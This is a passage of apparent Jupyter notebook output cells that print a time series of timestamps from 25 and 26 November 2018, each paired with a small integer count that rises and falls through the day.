"['2018-11-25 08:50:00', '3']\n",
"['2018-11-25 08:53:12', '3']\n",
"['2018-11-25 08:54:04', '3']\n",
"['2018-11-25 08:55:00', '6']\n",
"['2018-11-25 08:56:30', '4']\n",
"['2018-11-25 08:57:00', '4']\n",
"['2018-11-25 08:57:46', '4']\n",
"['2018-11-25 08:59:00', '4']\n",
"['2018-11-25 08:59:33', '4']\n",
"['2018-11-25 09:00:08', '4']\n",
"['2018-11-25 09:00:32', '4']\n",
"['2018-11-25 09:01:46', '4']\n",
"['2018-11-25 09:02:23', '4']\n",
"['2018-11-25 09:03:00', '0']\n",
"['2018-11-25 09:03:30', '0']\n",
"['2018-11-25 09:03:52', '0']\n",
"['2018-11-25 09:04:12', '0']\n",
"['2018-11-25 09:04:34', '0']\n",
"['2018-11-25 09:05:03', '0']\n",
"['2018-11-25 09:05:32', '0']\n",
"['2018-11-25 09:06:00', '0']\n",
"['2018-11-25 09:23:00', '1']\n",
"['2018-11-25 09:23:36', '1']\n",
"['2018-11-25 09:24:00', '3']\n",
"['2018-11-25 09:24:30', '3']\n",
"['2018-11-25 09:24:51', '3']\n",
"['2018-11-25 09:25:19', '4']\n",
"['2018-11-25 09:25:42', '4']\n",
"['2018-11-25 09:26:00', '4']\n",
"['2018-11-25 09:26:36', '4']\n",
"['2018-11-25 09:27:01', '4']\n",
"['2018-11-25 09:27:19', '4']\n",
"['2018-11-25 09:28:37', '6']\n",
"['2018-11-25 09:29:19', '6']\n",
"['2018-11-25 09:29:41', '8']\n",
"['2018-11-25 09:30:32', '10']\n",
"['2018-11-25 09:31:00', '11']\n",
"['2018-11-25 09:31:39', '11']\n",
"['2018-11-25 09:32:00', '10']\n",
"['2018-11-25 09:32:19', '10']\n",
"['2018-11-25 09:34:00', '11']\n",
"['2018-11-25 09:34:47', '12']\n",
"['2018-11-25 09:39:00', '11']\n",
"['2018-11-25 09:40:00', '11']\n",
"['2018-11-25 09:41:26', '11']\n",
"['2018-11-25 09:43:00', '11']\n",
"['2018-11-25 09:44:00', '9']\n",
"['2018-11-25 09:46:00', '9']\n",
"['2018-11-25 09:47:00', '9']\n",
"['2018-11-25 09:48:01', '10']\n",
"['2018-11-25 09:48:43', '10']\n",
"['2018-11-25 09:49:07', '10']\n",
"['2018-11-25 09:49:51', '11']\n",
"['2018-11-25 09:50:38', '11']\n",
"['2018-11-25 09:51:00', '11']\n",
"['2018-11-25 09:51:43', '9']\n",
"['2018-11-25 09:52:19', '9']\n",
"['2018-11-25 09:53:00', '9']\n",
"['2018-11-25 09:53:47', '8']\n",
"['2018-11-25 09:54:34', '8']\n",
"['2018-11-25 09:55:13', '8']\n",
"['2018-11-25 09:55:35', '8']\n",
"['2018-11-25 09:58:00', '8']\n",
"['2018-11-25 10:00:03', '2']\n",
"['2018-11-25 10:01:00', '2']\n",
"['2018-11-25 10:02:00', '1']\n",
"['2018-11-25 10:02:25', '1']\n",
"['2018-11-25 10:03:10', '1']\n",
"['2018-11-25 10:04:00', '0']\n",
"['2018-11-25 10:10:00', '1']\n",
"['2018-11-25 10:10:32', '1']\n",
"['2018-11-25 10:13:00', '1']\n",
"['2018-11-25 10:15:29', '3']\n",
"['2018-11-25 10:16:19', '4']\n",
"['2018-11-25 10:17:12', '4']\n",
"['2018-11-25 10:18:28', '5']\n",
"['2018-11-25 10:19:00', '6']\n",
"['2018-11-25 10:19:39', '6']\n",
"['2018-11-25 10:20:22', '6']\n",
"['2018-11-25 10:20:55', '5']\n",
"['2018-11-25 10:22:00', '5']\n",
"['2018-11-25 10:23:00', '7']\n",
"['2018-11-25 10:23:49', '8']\n",
"['2018-11-25 10:24:33', '8']\n",
"['2018-11-25 10:25:05', '8']\n",
"['2018-11-25 10:27:00', '9']\n",
"['2018-11-25 10:28:00', '9']\n",
"['2018-11-25 10:30:00', '13']\n",
"['2018-11-25 10:31:00', '13']\n",
"['2018-11-25 10:33:04', '13']\n",
"['2018-11-25 10:34:00', '13']\n",
"['2018-11-25 10:35:00', '23']\n",
"['2018-11-25 10:38:12', '23']\n",
"['2018-11-25 10:39:04', '26']\n",
"['2018-11-25 10:40:00', '27']\n",
"['2018-11-25 10:41:30', '19']\n",
"['2018-11-25 10:42:00', '17']\n",
"['2018-11-25 10:42:46', '17']\n",
"['2018-11-25 10:44:00', '16']\n",
"['2018-11-25 10:44:33', '17']\n",
"['2018-11-25 10:45:08', '16']\n",
"['2018-11-25 10:45:32', '14']\n",
"['2018-11-25 10:46:46', '14']\n",
"['2018-11-25 10:47:23', '9']\n",
"['2018-11-25 10:48:00', '9']\n",
"['2018-11-25 10:48:49', '9']\n",
"['2018-11-25 10:49:41', '9']\n",
"['2018-11-25 10:50:00', '9']\n",
"['2018-11-25 10:52:36', '7']\n",
"['2018-11-25 10:53:00', '0']\n",
"['2018-11-25 11:05:00', '6']\n",
"['2018-11-25 11:05:55', '9']\n",
"['2018-11-25 11:09:00', '9']\n",
"['2018-11-25 11:09:28', '10']\n",
"['2018-11-25 11:10:29', '10']\n",
"['2018-11-25 11:11:00', '10']\n",
"['2018-11-25 11:11:36', '10']\n",
"['2018-11-25 11:12:01', '10']\n",
"['2018-11-25 11:12:19', '10']\n",
"['2018-11-25 11:13:37', '9']\n",
"['2018-11-25 11:14:19', '18']\n",
"['2018-11-25 11:14:41', '22']\n",
"['2018-11-25 11:15:32', '27']\n",
"['2018-11-25 11:16:00', '27']\n",
"['2018-11-25 11:16:39', '27']\n",
"['2018-11-25 11:17:00', '31']\n",
"['2018-11-25 11:17:19', '31']\n",
"['2018-11-25 11:19:00', '28']\n",
"['2018-11-25 11:19:47', '27']\n",
"['2018-11-25 11:24:00', '37']\n",
"['2018-11-25 11:25:00', '39']\n",
"['2018-11-25 11:26:26', '38']\n",
"['2018-11-25 11:28:00', '41']\n",
"['2018-11-25 11:29:00', '44']\n",
"['2018-11-25 11:31:00', '50']\n",
"['2018-11-25 11:32:00', '65']\n",
"['2018-11-25 11:33:01', '64']\n",
"['2018-11-25 11:33:43', '63']\n",
"['2018-11-25 11:34:07', '63']\n",
"['2018-11-25 11:34:51', '63']\n",
"['2018-11-25 11:35:38', '63']\n",
"['2018-11-25 11:36:00', '58']\n",
"['2018-11-25 11:36:43', '58']\n",
"['2018-11-25 11:37:19', '58']\n",
"['2018-11-25 11:38:00', '58']\n",
"['2018-11-25 11:38:53', '58']\n",
"['2018-11-25 11:39:45', '58']\n",
"['2018-11-25 11:40:30', '58']\n",
"['2018-11-25 11:40:55', '58']\n",
"['2018-11-25 11:42:20', '58']\n",
"['2018-11-25 11:43:16', '0']\n",
"['2018-11-25 11:44:00', '0']\n",
"['2018-11-25 11:45:00', '0']\n",
"['2018-11-25 11:45:10', '0']\n",
"['2018-11-25 11:45:32', '0']\n",
"['2018-11-25 11:45:47', '0']\n",
"['2018-11-25 11:46:11', '0']\n",
"['2018-11-25 11:46:33', '0']\n",
"['2018-11-25 11:47:00', '0']\n",
"['2018-11-25 11:55:00', '0']\n",
"['2018-11-25 11:55:40', '0']\n",
"['2018-11-25 11:56:09', '0']\n",
"['2018-11-25 11:56:44', '0']\n",
"['2018-11-25 11:57:12', '0']\n",
"['2018-11-25 11:57:32', '0']\n",
"['2018-11-25 11:58:00', '0']\n",
"['2018-11-25 11:58:44', '0']\n",
"['2018-11-25 12:01:22', '0']\n",
"['2018-11-25 12:02:00', '0']\n",
"['2018-11-25 12:02:39', '0']\n",
"['2018-11-25 12:03:36', '0']\n",
"['2018-11-25 12:04:00', '0']\n",
"['2018-11-25 12:04:39', '0']\n",
"['2018-11-25 12:05:22', '0']\n",
"['2018-11-25 12:05:55', '0']\n",
"['2018-11-25 12:07:00', '0']\n",
"['2018-11-25 12:08:00', '0']\n",
"['2018-11-25 12:08:49', '22']\n",
"['2018-11-25 12:09:33', '23']\n",
"['2018-11-25 12:10:05', '23']\n",
"['2018-11-25 12:12:00', '17']\n",
"['2018-11-25 12:13:00', '12']\n",
"['2018-11-25 12:15:00', '12']\n",
"['2018-11-25 12:16:00', '14']\n",
"['2018-11-25 12:18:04', '18']\n",
"['2018-11-25 12:19:00', '18']\n",
"['2018-11-25 12:20:00', '38']\n",
"['2018-11-25 12:23:12', '39']\n",
"['2018-11-25 12:24:04', '39']\n",
"['2018-11-25 12:25:00', '44']\n",
"['2018-11-25 12:26:30', '41']\n",
"['2018-11-25 12:27:00', '41']\n",
"['2018-11-25 12:27:46', '39']\n",
"['2018-11-25 12:29:00', '39']\n",
"['2018-11-25 12:29:33', '39']\n",
"['2018-11-25 12:30:08', '38']\n",
"['2018-11-25 12:30:32', '13']\n",
"['2018-11-25 12:31:46', '13']\n",
"['2018-11-25 12:32:23', '13']\n",
"['2018-11-25 12:33:00', '13']\n",
"['2018-11-25 12:33:30', '13']\n",
"['2018-11-25 12:33:52', '13']\n",
"['2018-11-25 12:34:12', '13']\n",
"['2018-11-25 12:34:34', '2']\n",
"['2018-11-25 12:35:03', '2']\n",
"['2018-11-25 12:35:32', '2']\n",
"['2018-11-25 12:36:00', '0']\n",
"['2018-11-25 12:53:00', '1']\n",
"['2018-11-25 12:53:36', '1']\n",
"['2018-11-25 12:54:00', '1']\n",
"['2018-11-25 12:54:30', '1']\n",
"['2018-11-25 12:54:51', '-4']\n",
"['2018-11-25 12:55:19', '-4']\n",
"['2018-11-25 12:55:42', '-4']\n",
"['2018-11-25 12:56:00', '-4']\n",
"['2018-11-25 12:56:36', '-4']\n",
"['2018-11-25 12:57:01', '-4']\n",
"['2018-11-25 12:57:19', '-4']\n",
"['2018-11-25 12:58:37', '-4']\n",
"['2018-11-25 12:59:19', '-4']\n",
"['2018-11-25 12:59:41', '-2']\n",
"['2018-11-25 13:00:32', '-1']\n",
"['2018-11-25 13:01:00', '5']\n",
"['2018-11-25 13:01:39', '5']\n",
"['2018-11-25 13:02:00', '10']\n",
"['2018-11-25 13:02:19', '18']\n",
"['2018-11-25 13:04:00', '18']\n",
"['2018-11-25 13:04:47', '22']\n",
"['2018-11-25 13:09:00', '14']\n",
"['2018-11-25 13:10:00', '17']\n",
"['2018-11-25 13:11:26', '17']\n",
"['2018-11-25 13:13:00', '17']\n",
"['2018-11-25 13:14:00', '15']\n",
"['2018-11-25 13:16:00', '15']\n",
"['2018-11-25 13:17:00', '36']\n",
"['2018-11-25 13:18:01', '35']\n",
"['2018-11-25 13:18:43', '36']\n",
"['2018-11-25 13:19:07', '36']\n",
"['2018-11-25 13:19:51', '37']\n",
"['2018-11-25 13:20:38', '36']\n",
"['2018-11-25 13:21:00', '31']\n",
"['2018-11-25 13:21:43', '29']\n",
"['2018-11-25 13:22:19', '29']\n",
"['2018-11-25 13:23:00', '28']\n",
"['2018-11-25 13:23:47', '28']\n",
"['2018-11-25 13:24:34', '26']\n",
"['2018-11-25 13:25:13', '25']\n",
"['2018-11-25 13:25:35', '25']\n",
"['2018-11-25 13:28:00', '25']\n",
"['2018-11-25 13:30:03', '5']\n",
"['2018-11-25 13:31:00', '2']\n",
"['2018-11-25 13:32:00', '0']\n",
"['2018-11-25 13:32:25', '0']\n",
"['2018-11-25 13:33:10', '0']\n",
"['2018-11-25 13:34:00', '0']\n",
"['2018-11-25 13:40:00', '2']\n",
"['2018-11-25 13:40:32', '22']\n",
"['2018-11-25 13:43:00', '22']\n"
]
},
{
"name": "stdout",
"output_type": "stream",
"text": [
"['2018-11-25 13:45:29', '22']\n",
"['2018-11-25 13:46:19', '24']\n",
"['2018-11-25 13:47:12', '26']\n",
"['2018-11-25 13:48:28', '26']\n",
"['2018-11-25 13:49:00', '28']\n",
"['2018-11-25 13:49:39', '28']\n",
"['2018-11-25 13:50:22', '28']\n",
"['2018-11-25 13:50:55', '28']\n",
"['2018-11-25 13:52:00', '28']\n",
"['2018-11-25 13:53:00', '28']\n",
"['2018-11-25 13:53:49', '32']\n",
"['2018-11-25 13:54:33', '28']\n",
"['2018-11-25 13:55:05', '30']\n",
"['2018-11-25 13:57:00', '34']\n",
"['2018-11-25 13:58:00', '31']\n",
"['2018-11-25 14:00:00', '33']\n",
"['2018-11-25 14:01:00', '30']\n",
"['2018-11-25 14:03:04', '30']\n",
"['2018-11-25 14:04:00', '28']\n",
"['2018-11-25 14:05:00', '40']\n",
"['2018-11-25 14:08:12', '40']\n",
"['2018-11-25 14:09:04', '39']\n",
"['2018-11-25 14:10:00', '38']\n",
"['2018-11-25 14:11:30', '38']\n",
"['2018-11-25 14:12:00', '38']\n",
"['2018-11-25 14:12:46', '38']\n",
"['2018-11-25 14:14:00', '37']\n",
"['2018-11-25 14:14:33', '36']\n",
"['2018-11-25 14:15:08', '35']\n",
"['2018-11-25 14:15:32', '25']\n",
"['2018-11-25 14:16:46', '25']\n",
"['2018-11-25 14:17:23', '22']\n",
"['2018-11-25 14:18:00', '19']\n",
"['2018-11-25 14:18:49', '19']\n",
"['2018-11-25 14:19:41', '19']\n",
"['2018-11-25 14:20:00', '16']\n",
"['2018-11-25 14:22:36', '10']\n",
"['2018-11-25 14:23:00', '0']\n",
"['2018-11-25 14:34:00', '12']\n",
"['2018-11-25 14:35:09', '14']\n",
"['2018-11-25 14:39:00', '14']\n",
"['2018-11-25 14:39:28', '14']\n",
"['2018-11-25 14:40:29', '16']\n",
"['2018-11-25 14:41:00', '15']\n",
"['2018-11-25 14:41:36', '14']\n",
"['2018-11-25 14:42:01', '15']\n",
"['2018-11-25 14:42:19', '15']\n",
"['2018-11-25 14:43:37', '15']\n",
"['2018-11-25 14:44:19', '15']\n",
"['2018-11-25 14:44:41', '15']\n",
"['2018-11-25 14:45:32', '15']\n",
"['2018-11-25 14:46:00', '16']\n",
"['2018-11-25 14:47:18', '16']\n",
"['2018-11-25 14:48:00', '16']\n",
"['2018-11-25 14:48:19', '18']\n",
"['2018-11-25 14:50:00', '17']\n",
"['2018-11-25 14:50:47', '16']\n",
"['2018-11-25 14:55:00', '14']\n",
"['2018-11-25 14:56:00', '14']\n",
"['2018-11-25 14:57:26', '16']\n",
"['2018-11-25 14:59:00', '16']\n",
"['2018-11-25 15:00:00', '17']\n",
"['2018-11-25 15:02:00', '17']\n",
"['2018-11-25 15:03:00', '0']\n",
"['2018-11-25 15:04:31', '0']\n",
"['2018-11-25 15:05:35', '0']\n",
"['2018-11-25 15:06:11', '0']\n",
"['2018-11-25 15:07:16', '0']\n",
"['2018-11-25 15:08:27', '0']\n",
"['2018-11-25 15:09:00', '0']\n",
"['2018-11-25 15:10:04', '0']\n",
"['2018-11-25 15:10:59', '0']\n",
"['2018-11-25 15:12:00', '0']\n",
"['2018-11-25 15:12:53', '0']\n",
"['2018-11-25 15:13:45', '0']\n",
"['2018-11-25 15:14:30', '0']\n",
"['2018-11-25 15:14:55', '0']\n",
"['2018-11-25 15:16:20', '0']\n",
"['2018-11-25 15:17:16', '0']\n",
"['2018-11-25 15:18:00', '0']\n",
"['2018-11-25 15:19:00', '0']\n",
"['2018-11-25 15:19:15', '0']\n",
"['2018-11-25 15:19:47', '0']\n",
"['2018-11-25 15:20:10', '0']\n",
"['2018-11-25 15:20:46', '0']\n",
"['2018-11-25 15:21:19', '0']\n",
"['2018-11-25 15:22:00', '0']\n",
"['2018-11-25 15:37:00', '1']\n",
"['2018-11-25 15:37:53', '1']\n",
"['2018-11-25 15:38:32', '1']\n",
"['2018-11-25 15:39:19', '1']\n",
"['2018-11-25 15:39:56', '1']\n",
"['2018-11-25 15:40:22', '1']\n",
"['2018-11-25 15:41:00', '19']\n",
"['2018-11-25 15:41:44', '39']\n",
"['2018-11-25 15:44:22', '39']\n",
"['2018-11-25 15:45:00', '41']\n",
"['2018-11-25 15:45:39', '41']\n",
"['2018-11-25 15:46:36', '41']\n",
"['2018-11-25 15:47:00', '40']\n",
"['2018-11-25 15:47:52', '40']\n",
"['2018-11-25 15:48:49', '42']\n",
"['2018-11-25 15:49:33', '42']\n",
"['2018-11-25 15:51:00', '42']\n",
"['2018-11-25 15:52:12', '44']\n",
"['2018-11-25 15:53:11', '44']\n",
"['2018-11-25 15:54:04', '42']\n",
"['2018-11-25 15:54:42', '42']\n",
"['2018-11-25 15:57:00', '29']\n",
"['2018-11-25 15:58:00', '44']\n",
"['2018-11-25 16:00:00', '41']\n",
"['2018-11-25 16:01:00', '42']\n",
"['2018-11-25 16:03:04', '42']\n",
"['2018-11-25 16:04:00', '42']\n",
"['2018-11-25 16:05:00', '37']\n",
"['2018-11-25 16:08:12', '38']\n",
"['2018-11-25 16:09:04', '35']\n",
"['2018-11-25 16:10:00', '35']\n",
"['2018-11-25 16:11:30', '33']\n",
"['2018-11-25 16:12:00', '33']\n",
"['2018-11-25 16:12:46', '32']\n",
"['2018-11-25 16:14:00', '25']\n",
"['2018-11-25 16:14:33', '24']\n",
"['2018-11-25 16:15:08', '18']\n",
"['2018-11-25 16:15:32', '14']\n",
"['2018-11-25 16:16:46', '15']\n",
"['2018-11-25 16:17:23', '13']\n",
"['2018-11-25 16:18:00', '11']\n",
"['2018-11-25 16:18:49', '11']\n",
"['2018-11-25 16:19:41', '11']\n",
"['2018-11-25 16:20:00', '8']\n",
"['2018-11-25 16:24:21', '4']\n",
"['2018-11-25 16:25:00', '0']\n",
"['2018-11-25 16:34:00', '4']\n",
"['2018-11-25 16:35:09', '6']\n",
"['2018-11-25 16:39:00', '6']\n",
"['2018-11-25 16:39:28', '6']\n",
"['2018-11-25 16:40:29', '7']\n",
"['2018-11-25 16:41:00', '7']\n",
"['2018-11-25 16:41:36', '8']\n",
"['2018-11-25 16:42:01', '10']\n",
"['2018-11-25 16:42:19', '30']\n",
"['2018-11-25 16:43:37', '30']\n",
"['2018-11-25 16:44:19', '28']\n",
"['2018-11-25 16:44:41', '28']\n",
"['2018-11-25 16:45:32', '25']\n",
"['2018-11-25 16:46:00', '22']\n",
"['2018-11-25 16:47:18', '20']\n",
"['2018-11-25 16:48:00', '20']\n",
"['2018-11-25 16:48:19', '20']\n",
"['2018-11-25 16:50:00', '20']\n",
"['2018-11-25 16:50:47', '20']\n",
"['2018-11-25 16:55:00', '14']\n",
"['2018-11-25 16:56:00', '16']\n",
"['2018-11-25 16:57:26', '15']\n",
"['2018-11-25 16:59:00', '15']\n",
"['2018-11-25 17:00:00', '16']\n",
"['2018-11-25 17:02:00', '20']\n",
"['2018-11-25 17:03:00', '26']\n",
"['2018-11-25 17:04:31', '25']\n",
"['2018-11-25 17:05:35', '24']\n",
"['2018-11-25 17:06:11', '28']\n",
"['2018-11-25 17:07:16', '27']\n",
"['2018-11-25 17:08:27', '24']\n",
"['2018-11-25 17:09:00', '24']\n",
"['2018-11-25 17:10:04', '26']\n",
"['2018-11-25 17:10:59', '24']\n",
"['2018-11-25 17:12:00', '24']\n",
"['2018-11-25 17:12:53', '24']\n",
"['2018-11-25 17:13:45', '24']\n",
"['2018-11-25 17:14:30', '24']\n",
"['2018-11-25 17:14:55', '24']\n",
"['2018-11-25 17:16:20', '24']\n",
"['2018-11-25 17:17:16', '1']\n",
"['2018-11-25 17:18:00', '1']\n",
"['2018-11-25 17:19:00', '1']\n",
"['2018-11-25 17:19:15', '1']\n",
"['2018-11-25 17:19:47', '1']\n",
"['2018-11-25 17:20:10', '1']\n",
"['2018-11-25 17:20:46', '0']\n",
"['2018-11-25 17:21:19', '0']\n",
"['2018-11-25 17:22:00', '0']\n",
"['2018-11-25 17:37:00', '1']\n",
"['2018-11-25 17:37:53', '1']\n",
"['2018-11-25 17:38:32', '1']\n",
"['2018-11-25 17:39:19', '1']\n",
"['2018-11-25 17:39:56', '1']\n",
"['2018-11-25 17:40:22', '1']\n",
"['2018-11-25 17:41:00', '1']\n",
"['2018-11-25 17:41:44', '17']\n",
"['2018-11-25 17:44:22', '18']\n",
"['2018-11-25 17:45:00', '18']\n",
"['2018-11-25 17:45:39', '20']\n",
"['2018-11-25 17:46:36', '20']\n",
"['2018-11-25 17:47:00', '20']\n",
"['2018-11-25 17:47:52', '23']\n",
"['2018-11-25 17:48:49', '25']\n",
"['2018-11-25 17:49:33', '25']\n",
"['2018-11-25 17:51:00', '25']\n",
"['2018-11-25 17:52:12', '25']\n",
"['2018-11-25 17:53:11', '25']\n",
"['2018-11-25 17:54:04', '25']\n",
"['2018-11-25 17:54:42', '24']\n",
"['2018-11-25 17:57:00', '23']\n",
"['2018-11-25 17:58:00', '23']\n",
"['2018-11-25 18:00:00', '12']\n",
"['2018-11-25 18:01:00', '12']\n",
"['2018-11-25 18:03:04', '12']\n",
"['2018-11-25 18:04:00', '11']\n",
"['2018-11-25 18:05:00', '9']\n",
"['2018-11-25 18:08:12', '8']\n",
"['2018-11-25 18:09:04', '10']\n",
"['2018-11-25 18:10:00', '14']\n",
"['2018-11-25 18:11:30', '14']\n",
"['2018-11-25 18:12:00', '14']\n",
"['2018-11-25 18:12:46', '14']\n",
"['2018-11-25 18:14:00', '11']\n",
"['2018-11-25 18:14:33', '11']\n",
"['2018-11-25 18:15:08', '11']\n",
"['2018-11-25 18:15:32', '11']\n",
"['2018-11-25 18:16:46', '11']\n",
"['2018-11-25 18:17:23', '10']\n",
"['2018-11-25 18:18:00', '6']\n",
"['2018-11-25 18:18:49', '4']\n",
"['2018-11-25 18:19:41', '4']\n",
"['2018-11-25 18:20:00', '4']\n",
"['2018-11-25 18:24:21', '5']\n",
"['2018-11-25 18:25:00', '0']\n",
"['2018-11-25 18:34:00', '5']\n",
"['2018-11-25 18:35:09', '7']\n",
"['2018-11-25 18:39:00', '8']\n",
"['2018-11-25 18:39:28', '8']\n",
"['2018-11-25 18:40:29', '8']\n",
"['2018-11-25 18:41:00', '8']\n",
"['2018-11-25 18:41:36', '9']\n",
"['2018-11-25 18:42:01', '8']\n",
"['2018-11-25 18:42:19', '8']\n",
"['2018-11-25 18:43:37', '10']\n",
"['2018-11-25 18:44:19', '10']\n",
"['2018-11-25 18:44:41', '12']\n",
"['2018-11-25 18:45:32', '12']\n",
"['2018-11-25 18:46:00', '14']\n",
"['2018-11-25 18:47:18', '14']\n",
"['2018-11-25 18:48:00', '13']\n",
"['2018-11-25 18:48:19', '14']\n",
"['2018-11-25 18:50:00', '13']\n",
"['2018-11-25 18:50:47', '11']\n",
"['2018-11-25 18:55:00', '21']\n",
"['2018-11-25 18:56:00', '21']\n",
"['2018-11-25 18:57:26', '21']\n",
"['2018-11-25 18:59:00', '20']\n",
"['2018-11-25 19:00:00', '20']\n",
"['2018-11-25 19:02:00', '21']\n",
"['2018-11-25 19:03:00', '25']\n",
"['2018-11-25 19:04:31', '26']\n",
"['2018-11-25 19:05:35', '25']\n",
"['2018-11-25 19:06:11', '24']\n",
"['2018-11-25 19:07:16', '24']\n",
"['2018-11-25 19:08:27', '22']\n",
"['2018-11-25 19:09:00', '22']\n",
"['2018-11-25 19:10:04', '21']\n",
"['2018-11-25 19:10:59', '21']\n",
"['2018-11-25 19:12:00', '20']\n",
"['2018-11-25 19:12:53', '16']\n",
"['2018-11-25 19:13:45', '16']\n",
"['2018-11-25 19:14:30', '13']\n",
"['2018-11-25 19:14:55', '13']\n",
"['2018-11-25 19:16:20', '13']\n",
"['2018-11-25 19:17:16', '3']\n",
"['2018-11-25 19:18:00', '2']\n",
"['2018-11-25 19:19:00', '1']\n",
"['2018-11-25 19:19:15', '1']\n",
"['2018-11-25 19:19:47', '1']\n",
"['2018-11-25 19:20:10', '1']\n",
"['2018-11-25 19:20:46', '0']\n",
"['2018-11-25 19:21:19', '0']\n",
"['2018-11-25 19:22:00', '0']\n",
"['2018-11-25 19:37:00', '1']\n"
]
},
{
"name": "stdout",
"output_type": "stream",
"text": [
"['2018-11-25 19:37:53', '1']\n",
"['2018-11-25 19:38:32', '1']\n",
"['2018-11-25 19:39:19', '1']\n",
"['2018-11-25 19:39:56', '1']\n",
"['2018-11-25 19:40:22', '2']\n",
"['2018-11-25 19:41:00', '3']\n",
"['2018-11-25 19:41:44', '25']\n",
"['2018-11-25 19:44:22', '25']\n",
"['2018-11-25 19:45:00', '26']\n",
"['2018-11-25 19:45:39', '26']\n",
"['2018-11-25 19:46:36', '26']\n",
"['2018-11-25 19:47:00', '25']\n",
"['2018-11-25 19:47:52', '25']\n",
"['2018-11-25 19:48:49', '26']\n",
"['2018-11-25 19:49:33', '26']\n",
"['2018-11-25 19:51:00', '23']\n",
"['2018-11-25 19:52:12', '21']\n",
"['2018-11-25 19:53:11', '21']\n",
"['2018-11-25 19:54:04', '21']\n",
"['2018-11-25 19:54:42', '19']\n",
"['2018-11-25 19:57:00', '19']\n",
"['2018-11-25 19:58:00', '25']\n",
"['2018-11-25 20:00:00', '23']\n",
"['2018-11-25 20:01:00', '24']\n",
"['2018-11-25 20:03:04', '23']\n",
"['2018-11-25 20:04:00', '23']\n",
"['2018-11-25 20:05:00', '34']\n",
"['2018-11-25 20:08:12', '34']\n",
"['2018-11-25 20:09:04', '33']\n",
"['2018-11-25 20:10:00', '31']\n",
"['2018-11-25 20:11:30', '31']\n",
"['2018-11-25 20:12:00', '31']\n",
"['2018-11-25 20:12:46', '31']\n",
"['2018-11-25 20:14:00', '27']\n",
"['2018-11-25 20:14:33', '24']\n",
"['2018-11-25 20:15:08', '23']\n",
"['2018-11-25 20:15:32', '22']\n",
"['2018-11-25 20:16:46', '21']\n",
"['2018-11-25 20:17:23', '18']\n",
"['2018-11-25 20:18:00', '18']\n",
"['2018-11-25 20:18:49', '18']\n",
"['2018-11-25 20:19:41', '18']\n",
"['2018-11-25 20:20:00', '11']\n",
"['2018-11-25 20:24:21', '6']\n",
"['2018-11-25 20:25:00', '0']\n",
"['2018-11-25 20:34:00', '1']\n",
"['2018-11-25 20:35:09', '1']\n",
"['2018-11-25 20:39:00', '1']\n",
"['2018-11-25 20:39:28', '1']\n",
"['2018-11-25 20:40:29', '1']\n",
"['2018-11-25 20:41:00', '4']\n",
"['2018-11-25 20:41:36', '5']\n",
"['2018-11-25 20:42:01', '7']\n",
"['2018-11-25 20:42:19', '7']\n",
"['2018-11-25 20:43:37', '8']\n",
"['2018-11-25 20:44:19', '9']\n",
"['2018-11-25 20:44:41', '9']\n",
"['2018-11-25 20:45:32', '9']\n",
"['2018-11-25 20:46:00', '9']\n",
"['2018-11-25 20:47:18', '9']\n",
"['2018-11-25 20:48:00', '9']\n",
"['2018-11-25 20:48:19', '9']\n",
"['2018-11-25 20:50:00', '7']\n",
"['2018-11-25 20:50:47', '7']\n",
"['2018-11-25 20:55:00', '15']\n",
"['2018-11-25 20:56:00', '15']\n",
"['2018-11-25 20:57:26', '15']\n",
"['2018-11-25 20:59:00', '15']\n",
"['2018-11-25 21:00:00', '17']\n",
"['2018-11-25 21:02:00', '16']\n",
"['2018-11-25 21:03:00', '16']\n",
"['2018-11-25 21:04:31', '15']\n",
"['2018-11-25 21:05:35', '12']\n",
"['2018-11-25 21:06:11', '12']\n",
"['2018-11-25 21:07:16', '11']\n",
"['2018-11-25 21:08:27', '11']\n",
"['2018-11-25 21:09:00', '11']\n",
"['2018-11-25 21:10:04', '11']\n",
"['2018-11-25 21:10:59', '11']\n",
"['2018-11-25 21:12:00', '10']\n",
"['2018-11-25 21:12:53', '10']\n",
"['2018-11-25 21:13:45', '10']\n",
"['2018-11-25 21:14:30', '9']\n",
"['2018-11-25 21:14:55', '9']\n",
"['2018-11-25 21:16:20', '9']\n",
"['2018-11-25 21:17:16', '4']\n",
"['2018-11-25 21:18:00', '4']\n",
"['2018-11-25 21:19:00', '4']\n",
"['2018-11-25 21:19:15', '4']\n",
"['2018-11-25 21:19:47', '4']\n",
"['2018-11-25 21:20:10', '4']\n",
"['2018-11-25 21:20:46', '4']\n",
"['2018-11-25 21:21:19', '4']\n",
"['2018-11-25 21:22:00', '0']\n",
"['2018-11-26 06:11:04', '4']\n",
"['2018-11-26 06:11:39', '4']\n",
"['2018-11-26 06:14:49', '4']\n",
"['2018-11-26 06:15:03', '4']\n",
"['2018-11-26 06:15:42', '5']\n",
"['2018-11-26 06:16:36', '6']\n",
"['2018-11-26 06:17:26', '6']\n",
"['2018-11-26 06:17:44', '8']\n",
"['2018-11-26 06:17:51', '8']\n",
"['2018-11-26 06:19:00', '8']\n",
"['2018-11-26 06:19:32', '8']\n",
"['2018-11-26 06:19:54', '8']\n",
"['2018-11-26 06:20:34', '10']\n",
"['2018-11-26 06:21:20', '11']\n",
"['2018-11-26 06:22:48', '11']\n",
"['2018-11-26 06:23:22', '11']\n",
"['2018-11-26 06:23:33', '11']\n",
"['2018-11-26 06:24:49', '11']\n",
"['2018-11-26 06:25:11', '9']\n",
"['2018-11-26 06:27:47', '6']\n",
"['2018-11-26 06:29:17', '6']\n",
"['2018-11-26 06:29:54', '6']\n",
"['2018-11-26 06:30:32', '6']\n",
"['2018-11-26 06:30:46', '5']\n",
"['2018-11-26 06:32:25', '5']\n",
"['2018-11-26 06:33:58', '5']\n",
"['2018-11-26 06:34:39', '5']\n",
"['2018-11-26 06:35:04', '5']\n",
"['2018-11-26 06:35:19', '5']\n",
"['2018-11-26 06:37:17', '5']\n",
"['2018-11-26 06:37:47', '5']\n",
"['2018-11-26 06:38:03', '5']\n",
"['2018-11-26 06:38:37', '5']\n",
"['2018-11-26 06:39:00', '5']\n",
"['2018-11-26 06:39:30', '5']\n",
"['2018-11-26 06:40:06', '5']\n",
"['2018-11-26 06:40:46', '5']\n",
"['2018-11-26 06:41:15', '5']\n",
"['2018-11-26 06:41:28', '5']\n",
"['2018-11-26 06:42:50', '5']\n",
"['2018-11-26 06:43:28', '3']\n",
"['2018-11-26 06:44:16', '3']\n",
"['2018-11-26 06:44:37', '2']\n",
"['2018-11-26 06:45:31', '2']\n",
"['2018-11-26 06:46:06', '2']\n",
"['2018-11-26 06:46:23', '2']\n",
"['2018-11-26 06:46:51', '2']\n",
"['2018-11-26 06:47:15', '2']\n",
